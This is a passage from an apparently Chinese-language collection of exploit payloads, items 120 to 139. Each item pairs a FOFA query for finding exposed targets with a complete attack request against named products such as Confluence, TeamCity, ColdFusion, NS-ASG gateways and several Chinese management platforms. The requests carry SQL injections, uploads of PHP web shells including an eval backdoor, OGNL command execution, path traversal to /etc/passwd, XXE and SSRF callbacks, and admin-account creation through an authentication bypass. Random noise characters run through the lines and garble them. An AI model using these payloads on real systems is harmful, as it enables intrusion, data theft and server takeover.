X-Remote-Addr: 1.1.1.16 T8 }' F) P6 \5 O$ |, [
Te: trailers
1 d9 ]8 J' B/ H [& J2 x: XConnection: close( c& C, S0 i2 D. O' l
1 q8 w; b2 p9 B0 C8 j# V$ U
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456) w' G/ A3 m! J4 r3 A8 I8 C
" b7 Y" m* s6 T
9 f6 n1 [/ Q3 s3 A: T4 A120. 北京百绰智能S40管理平台导入web.php任意文件上传
# s% z+ h# @. aCVE-2024-1253
5 h0 A1 m' s# j& jFOFA:title="Smart管理平台") z2 l* r) N( w8 t- O& a2 `
POST /useratte/web.php? HTTP/1.1
# z# I/ n: p, b1 D, qHost: ip:port k7 L7 f) n/ s* G, N, m
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
4 y6 i2 K% }6 o/ E1 A8 @User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
& ?$ W2 E( }& AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% z8 D$ L% q* z. e" ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- I% U/ @( r& x' iAccept-Encoding: gzip, deflate
2 Y0 \- q5 o" g0 H! ?Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
8 B% A: w( ?* l: z6 J% SContent-Length: 597! C9 F) c- m9 d% d* S
Origin: https://ip:port* O" t7 L9 O- W% {8 E2 G
Referer: https://ip:port/sysmanage/licence.php
# T* g7 ]$ ~5 q& WUpgrade-Insecure-Requests: 1
! D N( ?1 R0 A+ ^: A! H" USec-Fetch-Dest: document
$ d# T( t: {" m) Z: L* p+ [% \Sec-Fetch-Mode: navigate
) _" x, l; {* f( ?5 vSec-Fetch-Site: same-origin
( O: o% t' i* U& _1 W2 W. }& w/ vSec-Fetch-User: ?1
9 C7 g3 Z9 }1 k5 JTe: trailers
* y0 f1 r2 J, I) j6 r+ h! T2 nConnection: close
~& U2 G* g# ], h, Q/ N/ v$ P% F
-----------------------------42328904123665875270630079328
$ N- j1 W4 x u5 d- Z& J' X1 p zContent-Disposition: form-data; name="file_upload"; filename="2.php"
5 ~' C/ A" A1 U5 h- [Content-Type: application/octet-stream
! {' G, f# g, t+ m+ I: T6 x3 v9 [$ Z* N: {$ N+ r* M% f3 B
<?php phpinfo()?>
) D" i0 k* |/ \! j1 E-----------------------------42328904123665875270630079328
4 x5 N* r* G$ r" D% I" W4 FContent-Disposition: form-data; name="id_type"
6 b0 }/ q$ Z) K; y2 S- }; O+ v2 X. E: F
1
. U: U! Q) s+ D* ~% [9 r( S9 x; k-----------------------------42328904123665875270630079328
0 n' f- e5 t1 m, VContent-Disposition: form-data; name="1_ck"
0 \1 ^2 x( B) }" N1 q% H' @- h) J9 Y+ @6 c$ P
1_radhttp
1 R5 m7 d5 T$ n+ o' ^3 p6 t9 U-----------------------------42328904123665875270630079328
! u$ x) L; I" s/ M% X3 AContent-Disposition: form-data; name="mode"6 W+ A7 v; l. r1 Y+ z
3 f( }" d8 @2 x, L- Z" e+ O- ?
import/ D' r" g* J0 W
-----------------------------42328904123665875270630079328# r/ X( L. `+ z
$ S& Y( m+ ]" m6 g C( J
2 f$ q9 q k- |1 h- L
文件路径/upload/2.php* W- s% e, b8 S7 n
( W S; W" @8 g! B0 R$ r121. 北京百绰智能S42管理平台userattestation.php任意文件上传
: M* E2 s! m. a' V+ W7 s0 SCVE-2024-19188 y( V; m7 p! D' [! h7 e
FOFA:title="Smart管理平台"
) P, X: Q/ t# w* j/ k/ BPOST /useratte/userattestation.php HTTP/1.1& L( K9 Q0 c0 ~7 Z
Host: 192.168.40.130:8443
7 m* c, M2 X0 U3 k" c. ]Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
- d, t' @- ~. d. J* G2 }User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
5 z- Z* X5 n$ b7 M% c+ l- oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 g/ ~1 {: {$ _9 x2 ?% J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 I7 n0 k) n t! nAccept-Encoding: gzip, deflate% A; T' c, d- E; x+ p
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
' i" v2 p6 H- t0 aContent-Length: 592' s, V! c, P9 T2 S6 w
Origin: https://192.168.40.130:8443
7 Z7 c% E2 I7 |$ G6 }: FUpgrade-Insecure-Requests: 1
1 l/ l9 P3 i4 ~0 QSec-Fetch-Dest: document
% `% \! _' P! GSec-Fetch-Mode: navigate- W j! F5 }" w- C+ c7 D
Sec-Fetch-Site: same-origin
' o( W2 o4 v, p5 b. l; L. a! F# BSec-Fetch-User: ?1
1 n, M: N6 z. p+ u9 L# m9 `' c) R( @Te: trailers+ d5 {! l9 I/ V8 m
Connection: close' c/ t& e% ~3 h! U3 D3 X
% W% c( x8 ` }" @) s; {8 D
-----------------------------423289041236658752706300793281 B0 _) k# z4 s* {) I2 Z
Content-Disposition: form-data; name="web_img"; filename="1.php"" e% `; @$ f, ~) |* R7 y, T* g" Q9 j
Content-Type: application/octet-stream
* J- x2 l! Y' Y' l1 |) B! c: d' ]: T& M5 h6 [7 M
<?php phpinfo();?>( J/ A9 c! C$ U" k. a
-----------------------------42328904123665875270630079328
' @9 |9 Z/ p: A7 E* w9 |- qContent-Disposition: form-data; name="id_type"( U0 |( G9 X4 X0 @5 y
" n/ o$ n# X7 K1+ Z( o' R& T% E% k0 w# b
-----------------------------42328904123665875270630079328
( l/ i, y8 G- _; ~Content-Disposition: form-data; name="1_ck"1 R: p8 j" J7 s B, r3 n
$ g! e+ y: i) ^* v8 F3 c1_radhttp
- s1 o! d, q- W-----------------------------42328904123665875270630079328
8 w, Q- ~7 v8 u& UContent-Disposition: form-data; name="hidwel"5 l6 k. L* \( Q7 N
9 g5 D# G* s6 d7 c3 o& U. }7 i4 dset, e4 r( u5 F! Z( Y
-----------------------------42328904123665875270630079328
/ o8 W4 E6 F: U( G1 A7 b
$ O2 u5 t2 s6 K% n' G
+ p* z# x) @9 p$ E: bboot/web/upload/weblogo/1.php
: a- \+ a( c: V# Q3 s# M8 e1 L2 s) K; {& f2 ^5 }6 ~
122. 北京百绰智能s200管理平台/importexport.php sql注入; T( q1 G" q6 _3 r1 l4 a
CVE-2024-27718FOFA:title="Smart管理平台": X% l: }1 b* p& z# t
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
1 ^/ v, z' _$ i/ f6 w4 K; i1 C* GGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1% v! k' B1 p6 h# e2 o: c2 G
Host: x.x.x.x
/ V. B+ R% j) YCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0 f" F. t/ ?5 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; y9 Q" J4 d- c# g( e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ k# q- D: y+ e6 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% p* `# v5 P" l" Y7 L
Accept-Encoding: gzip, deflate, br
4 Y, i2 E& G* S* |Upgrade-Insecure-Requests: 1% N, Z8 D2 K8 C f' f. I$ a
Sec-Fetch-Dest: document; d4 G1 u" c3 @$ |" I
Sec-Fetch-Mode: navigate% G$ z; a6 f3 l5 s
Sec-Fetch-Site: none
" S" T6 ]9 C2 s, w4 U+ s9 MSec-Fetch-User: ?1! {8 ?2 j* `8 C% F6 V
Te: trailers
1 z5 J5 d. [" d2 rConnection: close, a( Z0 {( q% s( P8 x2 e. \
$ t. `$ B) ], W7 r. P% L5 ~& H/ V: X2 o- _' ] G$ w6 r
123. Atlassian Confluence 模板注入代码执行
( p% T+ E( u8 ~8 d' @FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3") r4 _) ^* t* A2 X' y* H
POST /template/aui/text-inline.vm HTTP/1.1
. w; s, u4 k1 N c5 V$ GHost: localhost:8090
( @: U' M$ {# OAccept-Encoding: gzip, deflate, br$ u% S6 O1 b3 @7 V# L7 C6 E# D
Accept: */*9 w1 [4 t- Y0 D
Accept-Language: en-US;q=0.9,en;q=0.8
: ]: v( r. I" o' w: }" G4 f- rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
9 O+ T+ Q- S# y wConnection: close
( M" k1 ?" O* cContent-Type: application/x-www-form-urlencoded
' A/ D" I0 z. ]" f/ p0 B
& ?! ?7 z7 T% C; Llabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))" i% B; H( W, D$ Z. U8 X. p. v
% @" n) `) n- k, ^
! r1 Q+ r; Q% @ A) b! |& R; o124. 湖南建研工程质量检测系统任意文件上传
0 v; k! s& g' ^& I2 ]+ {FOFA:body="/Content/Theme/Standard/webSite/login.css"
; x) g. Z) b e/ P$ M% y! ~POST /Scripts/admintool?type=updatefile HTTP/1.1
+ x( ?8 h" d* c) J0 _! JHost: 192.168.40.130:8282
; i9 I: i/ b% L4 s+ T6 |User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
' p7 E/ h' J7 `. H0 v# @/ nContent-Length: 72
) l i2 w2 d3 t/ ?. cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8# C7 e9 Y0 m+ }" p
Accept-Encoding: gzip, deflate, br
; I! Q7 U7 ^) _9 V6 ]: lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
K+ i$ [; r$ v3 J( QConnection: close
3 g9 D1 _7 x) FContent-Type: application/x-www-form-urlencoded5 b+ z& P Q5 F. O+ d8 u) O" r
8 c4 ]$ z, I2 M% A# b% t* N
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
! r- T* A2 i- r7 z
+ G8 H( Z% u9 E9 X3 n/ y) h
$ `* P5 Y7 p+ B9 S0 W0 r: Ghttp://192.168.40.130:8282/Scripts/abcgcg.aspx
" w# ~/ l# J1 l" H8 k9 g1 P% n$ N
: h0 ~3 N0 U3 |( P125. ConnectWise ScreenConnect身份验证绕过
- e. N( B8 H! ZCVE-2024-1709
& h6 \" r2 d2 N: SFOFA:icon_hash="-82958153"* v7 S4 }# U" v$ r0 R Z
https://github.com/watchtowrlabs ... bypass-add-user-poc( ~! c6 D: I$ M# W5 [0 d
$ w" o; L, l6 S
: r3 ?8 U/ y. ^7 A, o- ^$ f
使用方法" [0 y$ w; Y6 y+ x2 c
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!' T0 C9 H+ r( R
/ [0 W1 i! {+ N9 o4 k' W( P3 D* g& `
创建好用户后直接登录后台,可以执行系统命令。" e, [$ W! U% H1 J- v9 o; F1 C
6 b) g* o, {8 R5 e9 k |126. Aiohttp 路径遍历
7 C( t- ?: H7 S: @FOFA:title=="ComfyUI"
% L8 u6 L/ \2 b1 T8 I! O4 oGET /static/../../../../../etc/passwd HTTP/1.1& ]/ H: f j8 |
Host: x.x.x.x
! \* M! h3 Y7 ~- Q5 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
( B1 f. U! r: v! z7 X+ BConnection: close
4 E$ B9 k# `: V- \% J6 c8 eAccept: */*
1 {, D2 k% S0 D) }, jAccept-Language: en
* `- G8 v, M5 ^1 D. y6 V2 \Accept-Encoding: gzip
. y/ S4 z5 d' G3 I
+ p: w6 h4 h8 z u1 T% M b1 c/ d: K
127. 广联达Linkworks DataExchange.ashx XXE* ^: p1 \. t, {% ?1 H- t3 W
FOFA:body="Services/Identification/login.ashx"
& C) l( s& h* S9 Z9 fPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1' X; v. V6 S+ c3 b) m) D, C
Host: 192.168.40.130:8888
- { _! A5 j# E' l( M2 o: j) A6 J, rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
. t, x/ Y6 M# A5 r& KContent-Length: 415+ l" L4 `2 U& J: [) e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" A# b2 h. i" M1 q& H) NAccept-Encoding: gzip, deflate
6 P' K. g. ^ s# ZAccept-Language: zh-CN,zh;q=0.9- @8 r* V( f% q% S! t
Connection: close8 Q8 x& S; K1 c7 ^
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe00 f9 x) Y6 s0 E8 O2 k
Purpose: prefetch
2 u+ H' {$ L1 kSec-Purpose: prefetch;prerender9 R( G# ?9 D& m4 s! F) i
1 B5 M5 p' E) j! F. N+ |8 m
------WebKitFormBoundaryJGgV5l5ta05yAIe0* N+ c3 U! G$ e+ c2 o1 E1 B
Content-Disposition: form-data;name="SystemName"
# F M! [% V* u+ I; m9 n; Q0 a
" J0 Y7 U7 Z; n# V& ]5 {BIM7 y% K( l1 n/ M8 V% K. l
------WebKitFormBoundaryJGgV5l5ta05yAIe02 X" M- f0 l) p% A: L2 T
Content-Disposition: form-data;name="Params"
. d$ d$ c: Y' I* nContent-Type: text/plain; m; \ K' n7 A
+ O5 G$ C8 ]0 t1 y$ P4 |3 ^1 {
<?xml version="1.0" encoding="UTF-8"?>1 ~0 c1 v% l" ~( a4 b! Q
<!DOCTYPE test [0 z8 q6 C- d) x, t9 y$ r( w8 s, V
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">' I# X3 U+ B1 L2 z) t& j
]
) |* X0 [2 @4 _/ L5 K5 [+ m>" `6 [1 I& L0 H8 T) z
<test>&t;</test>
; k* |3 G+ H8 C------WebKitFormBoundaryJGgV5l5ta05yAIe0--
3 L2 m: x/ w8 r1 n" X9 I- g
4 r' b) s: ~* n
; i; K( o- @) b; A) C
! A8 T+ f8 e5 n) I3 n7 V6 n128. Adobe ColdFusion 反序列化
( m0 X6 p/ a/ k4 e) T7 @, _CVE-2023-38203
0 H C% B ~# R% rAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本), p x! y! k. w5 L
FOFA:app="Adobe-ColdFusion"
1 |4 {4 X/ t3 V1 _$ [ ?. WPAYLOAD6 V3 E8 }3 ]5 Z7 A9 G: a# R
! T# m6 b2 Z8 {& a
129. Adobe ColdFusion 任意文件读取
9 D7 ]7 J8 ], F6 d/ n: K$ ~' vCVE-2024-20767 _% Y) y) [9 }; n) h- o
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"; e! V0 ] l9 T2 E, o% Y
第一步,获取uuid
" Y0 n) R1 L& l1 U4 \GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.16 E8 r$ v) g% u2 F, m
Host: x.x.x.x
. x# ]; A- B, ~9 Z+ `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.368 p( J6 D+ I# S+ C# |0 W: G& a9 J
Accept: */*% z6 m, H% x( \' k: D3 Q
Accept-Encoding: gzip, deflate
8 ^; ^5 D6 U7 A3 u/ z4 WConnection: close* h; ?$ f; q: h+ F
( W/ A0 @. _1 b7 ^# i
4 T' T3 z h& }
第二步,读取/etc/passwd文件" \' O1 w6 Y4 f0 O
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.17 } N2 V0 O3 Z! v; H
Host: x.x.x.x
, w* V$ A W+ Q' v) R LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.366 C1 r5 B3 j T
Accept: */*! {5 x6 ~% G5 {' O; x, H& {" q
Accept-Encoding: gzip, deflate
( l; T8 Z f( Q+ K! {Connection: close
9 d; @* F! L' u6 A- w% J( M+ Muuid: 85f60018-a654-4410-a783-f81cbd5000b9
8 e l. V$ X$ ?
4 g6 D- V; z9 ?# Y( I& T
! k+ l1 D' y. m6 w: X" t6 p130. Laykefu客服系统任意文件上传
- Q" J: q# p" q4 Z/ F o4 r% g/ oFOFA:icon_hash="-334624619"
% N6 o: i5 Q3 ePOST /admin/users/upavatar.html HTTP/1.1; [5 {0 t2 U5 } w8 ]% M; P
Host: 127.0.0.1" \3 g: A4 N3 g* u! ]
Accept: application/json, text/javascript, */*; q=0.018 X0 z j2 j# B3 M3 ~" O
X-Requested-With: XMLHttpRequest8 l9 @* q! H5 ~$ I. |! b
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26; u+ E7 H- P- y7 L: @8 n F/ E- F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
. H/ L- [+ C* S( [# E7 WAccept-Encoding: gzip, deflate
" v* q/ U2 D6 A: m5 \( ]Accept-Language: zh-CN,zh;q=0.9
# l6 E' E8 i4 N, JCookie: user_name=1; user_id=3
9 g5 A) v4 U* l R1 \2 RConnection: close6 J9 e% e" m; [4 r7 m
; `5 h2 Q5 S" C. d1 Z4 e6 O- q------WebKitFormBoundary3OCVBiwBVsNuB2kR
0 M4 L4 D- G. [. a9 i% a1 ` P) ?Content-Disposition: form-data; name="file"; filename="1.php"
2 J4 q1 d/ B* P8 SContent-Type: image/png+ K9 b. S' w3 l8 [, E: |. p9 E- y' H
# B* J! n' s6 s
<?php phpinfo();@eval($_POST['sec']);?>
9 L1 U" O: t% r' v* t------WebKitFormBoundary3OCVBiwBVsNuB2kR--' O& J$ s, P/ c
# i z1 V+ x8 }; I! j
9 B: R/ N, `2 ] j* y/ ~& z( x- w
131. Mini-Tmall <=20231017 SQL注入# U9 k& d/ W- N+ [+ s
FOFA:icon_hash="-2087517259"
9 @/ O" y/ P2 }7 F @. n- y后台地址:http://localhost:8080/tmall/admin" M2 y. A3 i' A5 [; T" F8 `8 M9 R- W
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
$ J2 Q8 a9 u( w, o* Y) V
' d5 M2 F3 x" J$ D5 a: o* R132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过( E0 b; X; w0 f t% m- W7 E2 R( s
CVE-2024-27198
% H( } a/ g( Q- K) c! LFOFA:body="Log in to TeamCity"
) N! ]9 Z" U2 I0 jPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1, i& }; V, A- J/ V1 z5 @
Host: 192.168.40.130:8111
; }3 w3 k) Z% p, ?" r c9 l9 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- e/ M! W( [) ~6 E' I2 YAccept: */*
6 `! b! F: H9 u3 o# v6 u6 F: RContent-Type: application/json3 ?! N0 O' R; k& }; y' \: W1 ~1 I7 ?
Accept-Encoding: gzip, deflate
" c, Z! ?$ U N, h% p5 [& I7 u, e" l h8 v8 P2 l
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}& P0 @) V% c4 @8 `( E3 y+ M* g) @
0 @8 s* ^0 A( k8 r5 V- u
7 N3 ^7 Z3 Z% q0 VCVE-2024-27199: d9 |+ q7 T- N2 [
/res/../admin/diagnostic.jsp6 u& j& v; M9 P& h" z! w) P
/.well-known/acme-challenge/../../admin/diagnostic.jsp
n6 J# g2 j7 X; V8 Z/update/../admin/diagnostic.jsp
# E( `6 \( R- N* |5 f3 ^% @" S4 D1 `! ?7 C0 X
: u [& u& j" B9 w
CVE-2024-27198-RCE.py% c+ M# P8 d, X3 r
2 [, Q- |' k3 S J133. H5 云商城 file.php 文件上传
, X h" ~% \ JFOFA:body="/public/qbsp.php"
1 V% _/ a" J& ^' K% Z O6 W( NPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
; v- T/ v6 @; L' sHost: your-ip, {: M. M* U$ W( o! z0 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
2 q9 ] I. K* a/ g# r+ QContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
* S0 |3 H' t$ w A& R9 F4 I: n4 E2 V8 S! s
------WebKitFormBoundaryFQqYtrIWb8iBxUCx" u/ y I- F/ Q2 { b% A& f! S+ G
Content-Disposition: form-data; name="file"; filename="rce.php"5 Y7 U0 G' P6 ^
Content-Type: application/octet-stream
* m3 a, h$ s" i1 s4 H J& L o! E" v0 t/ f5 a8 {' D
<?php system("cat /etc/passwd");unlink(__FILE__);?>- [. G' ]: Q/ r3 B
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--2 m" t$ w: B+ Y/ y
2 ^& g) c8 F5 @- E- X/ b' `3 M1 ^6 k- l
' M3 \) }! W% X' S6 V134. 网康NS-ASG应用安全网关index.php sql注入7 w: z- J9 ?3 f; c. P
CVE-2024-23308 A8 G" ], x! [# }8 q
Netentsec NS-ASG Application Security Gateway 6.3版本
: a3 Z, T2 o gFOFA:app="网康科技-NS-ASG安全网关"
% Z7 k: J- j! A# \4 }POST /protocol/index.php HTTP/1.1( C' O7 C0 j$ ~; U& ?
Host: x.x.x.x
5 c8 J8 O& d; r K. b1 DCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de2 C3 v2 P8 k& B7 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
, |: B. T6 K; Z- t" UAccept: */*
4 q/ B+ n/ {% l* m% XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% m) ~& q8 e/ TAccept-Encoding: gzip, deflate
" x8 W; ^( P# m5 S7 M# ~Sec-Fetch-Dest: empty
9 S' F" X# C- u" }) E VSec-Fetch-Mode: cors1 @5 b' G4 X$ t0 W; e3 j
Sec-Fetch-Site: same-origin2 W; [1 ?! E) P, | C/ q% b* w `
Te: trailers. x2 v4 p" s( N3 a; f
Connection: close1 {! t. T" z7 D
Content-Type: application/x-www-form-urlencoded& T" P l% Y* s5 ]/ }3 r9 {' Q
Content-Length: 263' A; a/ t- G. J9 ?. u E
2 z9 ~2 _. N" `8 r) p, H% F
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
7 [! J: e1 S8 \& J) y
* ?: m5 L/ ]' l& i$ e
) \$ H" q3 V: J6 Y/ K" ]1 S135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
& ` c$ }4 E6 }# ]CVE-2024-20224 z% q' W$ _" s& _$ t8 `8 t
Netentsec NS-ASG Application Security Gateway 6.3版本
4 G' I% w; i- W6 I4 X; U& gFOFA:app="网康科技-NS-ASG安全网关"- ?- ]3 G5 d0 k, O& I6 ]) Q; H
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1* e# a8 r7 Y. H5 M7 |4 n
Host: x.x.x.x4 G; L2 Q9 q" I; _& S [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* X" ^6 p& b; o8 j3 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 I% l% A: B$ Q0 _6 BAccept-Encoding: gzip, deflate
3 }. U& y2 x4 {0 i! s& B6 \. ]) V* UAccept-Language: zh-CN,zh;q=0.96 I" P2 ~5 T8 M( d: I7 E, Z0 N @
Connection: close
% o2 ]2 x" P3 w6 |# ?$ u6 @* p: C9 N. j
# ?! j3 k1 M1 d2 z9 N3 ?. `$ }
136. NextChat cors SSRF8 @4 c7 l8 g5 ^! L: J
CVE-2023-49785
; P) b/ {3 W/ k: ZFOFA:title="NextChat"/ g6 @ ?" U7 @: H
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
~8 u/ z/ H: m, P& eHost: x.x.x.x:10000# O4 M5 |. \5 L6 F* j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' @9 ?" P2 S$ k! O7 dConnection: close4 D2 E I- g3 t- U& m
Accept: */*
; c* c! @3 e1 `) [' qAccept-Language: en
" ^$ L) _" J% s" q wAccept-Encoding: gzip5 i4 N3 ? d: H7 Z- A j! @
; D* c8 T3 O1 C& H3 |; B
! ]& [4 f" ]0 @+ {) O
137. 福建科立迅通信指挥调度平台down_file.php sql注入 k3 N4 t" {' }! j7 a+ Z2 G
CVE-2024-26207 g1 g G: M& n' Y
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
' v/ }8 U# N8 MGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.16 q- T9 Q4 ]" [" n
Host: x.x.x.x
0 E3 i/ {: F. {0 B5 t! CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0& {* i5 V5 T0 X8 J2 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' `+ a! ^) k3 J/ A( Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" l- z3 ?2 {2 e
Accept-Encoding: gzip, deflate, br
6 B9 n& S _0 D. a# o0 eConnection: close- K3 t9 R( E m. U1 @% H+ p
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj1 j' K% o% N* u( r, x1 b) v: l
Upgrade-Insecure-Requests: 1
' ^% g; v, F2 K) J4 q% x: j, m( N/ {0 @1 w6 J
N* n" ]+ N4 U! a. d2 {5 E6 P138. 福建科立讯通信指挥调度平台pwd_update.php sql注入, a1 k+ Y' a" c# A) K$ P9 [3 J
CVE-2024-2621! P. m2 m2 N$ f$ C7 t
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 h4 _% A( L: M$ @0 K6 Y0 T. y
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1+ Z# Q2 B! E3 ~
Host: x.x.x.x0 `! K" ]( `6 I: d1 H* n D5 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ j& H! a/ y0 I3 `' Y0 ^. E4 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% k. `# B4 p& O3 F$ j& eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! }! M4 L1 O$ F4 {; m
Accept-Encoding: gzip, deflate, br
3 ~$ S6 x9 S$ u4 P. I1 KConnection: close& U: ^, P( C% O" h* m6 a
Upgrade-Insecure-Requests: 1
* x! e) M* r" O/ `2 T7 M' D7 r- v& ^0 I
5 t" l5 Y* |% g# M3 x! r0 G3 y
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
: F$ Z" R8 C$ a8 \: FCVE-2024-2622
) Y# D; S2 X6 I' z4 i x6 }/ ]FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"( h# W: H4 d' o0 O2 N2 q
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1$ G$ d3 W2 j- l9 ?0 I4 T9 y5 j
Host: x.x.x.x& ?9 h. r- G0 n1 a4 R% |( T
